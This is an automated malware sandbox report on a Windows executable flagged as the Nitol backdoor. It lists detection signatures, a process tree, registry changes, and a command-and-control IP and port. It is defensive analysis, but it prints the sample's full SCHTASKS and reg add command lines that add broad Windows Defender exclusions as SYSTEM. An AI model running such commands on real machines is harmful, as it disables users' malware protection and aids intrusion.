Edit tour

Windows Analysis Report
287438657364-7643738421.08.exe

Overview

General Information

Sample name:	287438657364-7643738421.08.exe
Analysis ID:	1585091
MD5:	12771744b7de8ffb1f0dddf3ac8ed2f4
SHA1:	c05938c681c3c840a9e484bed33c48fcd033dd27
SHA256:	4df10f78a78892fea0c94ef9aca83ddac4045a1b2bec807f4bf563ac14551224
Tags:	backdoorexesilverfoxwinosuser-zhuzhu0009
Infos:

Detection

Nitol

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Detected unpacking (creates a PE file in dynamic memory)

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Nitol

AI detected suspicious sample

Adds extensions / path to Windows Defender exclusion list (Registry)

Creates an undocumented autostart registry key

Drops PE files to the document folder of the user

Found direct / indirect Syscall (likely to bypass EDR)

Machine Learning detection for dropped file

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

PE file contains section with special chars

Sample is not signed and drops a device driver

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Switches to a custom stack to bypass stack traces

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Uses cmd line tools excessively to alter registry or file data

Uses schtasks.exe or at.exe to add and modify task schedules

AV process strings found (often used to terminate AV products)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to delete services

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates COM task schedule object (often to register a task for autostart)

Creates a process in suspended mode (likely to inject code)

Creates driver files

Creates files inside the driver directory

Creates files inside the system directory

Creates or modifies windows services

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Entry point lies outside standard sections

Found dropped PE file which has not been started or loaded

Found evasive API chain (may stop execution after checking a module file name)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE

Sigma detected: Windows Defender Exclusions Added - Registry

Uses code obfuscation techniques (call, push, ret)

Uses reg.exe to modify the Windows registry

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Process Tree

System is w10x64

287438657364-7643738421.08.exe (PID: 7648 cmdline: "C:\Users\user\Desktop\287438657364-7643738421.08.exe" MD5: 12771744B7DE8FFB1F0DDDF3AC8ED2F4)

lOXFJk.exe (PID: 7200 cmdline: C:\Users\user\Documents\lOXFJk.exe MD5: D3709B25AFD8AC9B63CBD4E1E1D962B9)

lOXFJk.exe (PID: 7296 cmdline: C:\Users\user\Documents\lOXFJk.exe MD5: D3709B25AFD8AC9B63CBD4E1E1D962B9)

cmd.exe (PID: 2312 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 4916 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 1900 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 5012 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)

cmd.exe (PID: 2304 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 7632 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7692 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7448 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)

cmd.exe (PID: 4408 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 3328 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7748 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 5088 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)

cmd.exe (PID: 1620 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 7880 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 5676 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7908 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)

vhZp0W.exe (PID: 4336 cmdline: "C:\Program Files (x86)\vhZp0W\vhZp0W.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)

cmd.exe (PID: 8044 cmdline: cmd /c echo.>c:\xxxx.ini MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 1052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7324 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 3488 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)

cmd.exe (PID: 7412 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 2896 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)

cmd.exe (PID: 4296 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 1432 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)

cmd.exe (PID: 4428 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 7960 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)

vhZp0W.exe (PID: 1984 cmdline: "C:\Program Files (x86)\vhZp0W\vhZp0W.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)

1y6U0V.exe (PID: 1784 cmdline: "C:\Program Files (x86)\b3aEb0H\1y6U0V.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)

1y6U0V.exe (PID: 5368 cmdline: "C:\Program Files (x86)\b3aEb0H\1y6U0V.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)

vhZp0W.exe (PID: 3408 cmdline: "C:\Program Files (x86)\vhZp0W\vhZp0W.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)

vhZp0W.exe (PID: 1220 cmdline: "C:\Program Files (x86)\vhZp0W\vhZp0W.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)

1y6U0V.exe (PID: 5416 cmdline: "C:\Program Files (x86)\b3aEb0H\1y6U0V.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Nitol		No Attribution	https://asec.ahnlab.com/en/44504/ https://blogs.technet.microsoft.com/microsoft_blog/2012/09/13/microsoft-disrupts-the-emerging-nitol-botnet-being-spread-through-an-unsecure-supply-chain/ https://en.wikipedia.org/wiki/Nitol_botnet https://krebsonsecurity.com/tag/nitol/	https://malpedia.caad.fkie.fraunhofer.de/details/win.nitol

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000027.00000002.3528421015.00000000054E0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
00000027.00000002.3528906375.000000001002D000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
Process Memory Space: vhZp0W.exe PID: 4336	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
Process Memory Space: vhZp0W.exe PID: 4336	PlugXStrings	PlugX Identifying Strings	Seth Hardy	0x4bd86:$Dwork: d:\work 0xa087a:$Dwork: d:\work 0xc1408:$Dwork: d:\work 0xfde61:$Dwork: d:\work 0x123c38:$Shell6: Shell6 0x124a17:$Shell6: Shell6

Unpacked PEs

Source	Rule	Description	Author	Strings
39.2.vhZp0W.exe.54e03e8.6.unpack	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
39.2.vhZp0W.exe.54e03e8.6.raw.unpack	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
39.2.vhZp0W.exe.10000000.8.unpack	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
4.2.lOXFJk.exe.2770000.1.unpack	INDICATOR_SUSPICIOUS_DisableWinDefender	Detects executables containing artifcats associated with disabling Widnows Defender	ditekSHen	0x1fb0f:$e1: Microsoft\Windows Defender\Exclusions\Paths 0x1fbc2:$e1: Microsoft\Windows Defender\Exclusions\Paths 0x1fcd2:$e1: Microsoft\Windows Defender\Exclusions\Paths 0x1fc20:$e2: Add-MpPreference -ExclusionPath
39.2.vhZp0W.exe.3a50000.4.unpack	INDICATOR_SUSPICIOUS_DisableWinDefender	Detects executables containing artifcats associated with disabling Widnows Defender	ditekSHen	0x221dd:$e1: Microsoft\Windows Defender\Exclusions\Paths 0x2225b:$e2: Add-MpPreference -ExclusionPath

Sigma Signatures

System Summary

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Source: Process started

Author: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, CommandLine: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Users\user\Documents\lOXFJk.exe, ParentImage: C:\Users\user\Documents\lOXFJk.exe, ParentProcessId: 7296, ParentProcessName: lOXFJk.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, ProcessId: 2312, ProcessName: cmd.exe

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Source: Process started

Sigma detected: Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE

Source: Process started

Author: frack113: Data: Command: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, CommandLine: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, CommandLine|base64offset|contains: , Image: C:\Windows\System32\reg.exe, NewProcessName: C:\Windows\System32\reg.exe, OriginalFileName: C:\Windows\System32\reg.exe, ParentCommandLine: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7324, ParentProcessName: cmd.exe, ProcessCommandLine: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, ProcessId: 3488, ProcessName: reg.exe

Sigma detected: Windows Defender Exclusions Added - Registry

Source: Registry Key set

Author: Christian Burkard (Nextron Systems): Data: Details: 0, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\reg.exe, ProcessId: 3488, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData

Suricata Signatures

ETPRO MALWARE Backdoor/Win.Gh0stRAT CnC Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-07T04:23:07.225604+0100	2852901	1	Malware Command and Control Activity Detected	192.168.2.4	50017	8.217.47.169	8917	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for dropped file

Source: C:\Program Files (x86)\vhZp0W\tbcore3U.dll	Avira: detection malicious, Label: TR/Redcap.vdzex
Source: C:\Program Files (x86)\b3aEb0H\tbcore3U.dll	Avira: detection malicious, Label: TR/Redcap.vdzex

Multi AV Scanner detection for submitted file

Source: 287438657364-7643738421.08.exe

Virustotal: Detection: 11%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.8% probability

Machine Learning detection for dropped file

Source: C:\Program Files (x86)\vhZp0W\tbcore3U.dll	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\b3aEb0H\tbcore3U.dll	Joe Sandbox ML: detected

Compliance

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe

Unpacked PE file: 39.2.vhZp0W.exe.5750000.7.unpack

Source: unknown	HTTPS traffic detected: 39.103.20.48:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 118.178.60.9:443 -> 192.168.2.4:49835 version: TLS 1.2

Source:	Binary string: F:\Development\GS-DES\DES10.0\HKPROC\bin\x64\UnicodeRelease\HkApp.x64.pdb source: 287438657364-7643738421.08.exe
Source:	Binary string: d:\work\iGiveButton\toolbar4\Release_bin\uninstall.pdb source: lOXFJk.exe, 00000005.00000003.2506024651.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, vhZp0W.exe, 00000027.00000002.3526255282.00000000013B9000.00000004.00000020.00020000.00000000.sdmp, vhZp0W.exe, 00000027.00000002.3526255282.000000000132E000.00000004.00000020.00020000.00000000.sdmp, vhZp0W.exe, 00000027.00000000.2721373550.0000000000088000.00000002.00000001.01000000.0000000A.sdmp, vhZp0W.exe, 00000027.00000002.3526029548.0000000000088000.00000002.00000001.01000000.0000000A.sdmp, vhZp0W.exe, 00000028.00000002.2756189237.0000000000088000.00000002.00000001.01000000.0000000A.sdmp, vhZp0W.exe, 00000028.00000000.2747027719.0000000000088000.00000002.00000001.01000000.0000000A.sdmp, 1y6U0V.exe, 0000002B.00000002.2758444826.0000000000958000.00000002.00000001.01000000.0000000C.sdmp, 1y6U0V.exe, 0000002B.00000000.2750952839.0000000000958000.00000002.00000001.01000000.0000000C.sdmp, 1y6U0V.exe, 0000002C.00000000.2762170195.0000000000958000.00000002.00000001.01000000.0000000C.sdmp, 1y6U0V.exe, 0000002C.00000002.2778557665.0000000000958000.00000002.00000001.01000000.0000000C.sdmp, vhZp0W.exe, 0000002D.00000002.2778065459.0000000000088000.00000002.00000001.01000000.0000000A.sdmp, vhZp0W.exe, 0000002D.00000000.2763117878.0000000000088000.00000002.00000001.01000000.0000000A.sdmp, vhZp0W.exe, 0000002E.00000002.3328846479.0000000000088000.00000002.00000001.01000000.0000000A.sdmp, vhZp0W.exe, 0000002E.00000000.3319675014.0000000000088000.00000002.00000001.01000000.0000000A.sdmp, 1y6U0V.exe, 0000002F.00000000.3321325618.0000000000958000.00000002.00000001.01000000.0000000C.sdmp, 1y6U0V.exe, 0000002F.00000002.3329795328.0000000000958000.00000002.00000001.01000000.0000000C.sdmp, vhZp0W.exe.5.dr, 1y6U0V.exe.39.dr
Source:	Binary string: c:\tools_git_priv\truesight\driver\objfre_win7_amd64\amd64\TrueSight.pdb source: 189atohci.sys.0.dr
Source:	Binary string: y:\avsdk5\engine\make\build\public\64-bit\vseamps.pdb source: 287438657364-7643738421.08.exe, 00000000.00000003.2165224733.00000000048B4000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2128903487.00000000048D1000.00000004.00000020.00020000.00000000.sdmp, lOXFJk.exe, 00000004.00000000.2264514423.0000000140014000.00000002.00000001.01000000.00000008.sdmp, lOXFJk.exe, 00000004.00000002.2270058715.0000000140014000.00000002.00000001.01000000.00000008.sdmp, lOXFJk.exe, 00000005.00000000.2283669117.0000000140014000.00000002.00000001.01000000.00000008.sdmp, lOXFJk.exe.0.dr

Change of critical system settings

Adds extensions / path to Windows Defender exclusion list (Registry)

Source: C:\Windows\System32\reg.exe	Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\ProgramData	Jump to behavior
Source: C:\Windows\System32\reg.exe	Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Users	Jump to behavior
Source: C:\Windows\System32\reg.exe	Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Program Files (x86)	Jump to behavior
Source: C:\Windows\System32\reg.exe	Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Users\user\Documents	Jump to behavior

Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32	Jump to behavior
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer	Jump to behavior
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation	Jump to behavior
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior

Source: C:\Users\user\Documents\lOXFJk.exe

Code function: 4_2_00007FFE1A51A1B8 FindFirstFileExW,

4_2_00007FFE1A51A1B8

Source: C:\Users\user\Documents\lOXFJk.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	Jump to behavior
Source: C:\Users\user\Documents\lOXFJk.exe	File opened: C:\Users\user\AppData	Jump to behavior

Source: C:\Users\user\Documents\lOXFJk.exe	Code function: 4x nop then mov rax, qword ptr [rsp+78h]	4_2_000000014000DFFE
Source: C:\Users\user\Documents\lOXFJk.exe	Code function: 4x nop then mov rax, qword ptr [rsp+78h]	4_2_000000014000DDFF
Source: C:\Users\user\Documents\lOXFJk.exe	Code function: 4x nop then movsxd rbx, qword ptr [r14+10h]	4_2_0000000140011270
Source: C:\Users\user\Documents\lOXFJk.exe	Code function: 4x nop then mov rax, qword ptr [rsp+78h]	4_2_000000014000DE96
Source: C:\Users\user\Documents\lOXFJk.exe	Code function: 4x nop then mov rax, qword ptr [rsp+78h]	4_2_000000014000DEFB
Source: C:\Users\user\Documents\lOXFJk.exe	Code function: 4x nop then mov rax, qword ptr [rsp+78h]	4_2_000000014000E178
Source: C:\Users\user\Documents\lOXFJk.exe	Code function: 4x nop then mov rax, qword ptr [rsp+78h]	4_2_000000014000DDD9

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2852901 - Severity 1 - ETPRO MALWARE Backdoor/Win.Gh0stRAT CnC Checkin : 192.168.2.4:50017 -> 8.217.47.169:8917

Source: global traffic

TCP traffic: 192.168.2.4:50017 -> 8.217.47.169:8917

Source: Joe Sandbox View

IP Address: 118.178.60.9 118.178.60.9

Source: Joe Sandbox View

ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

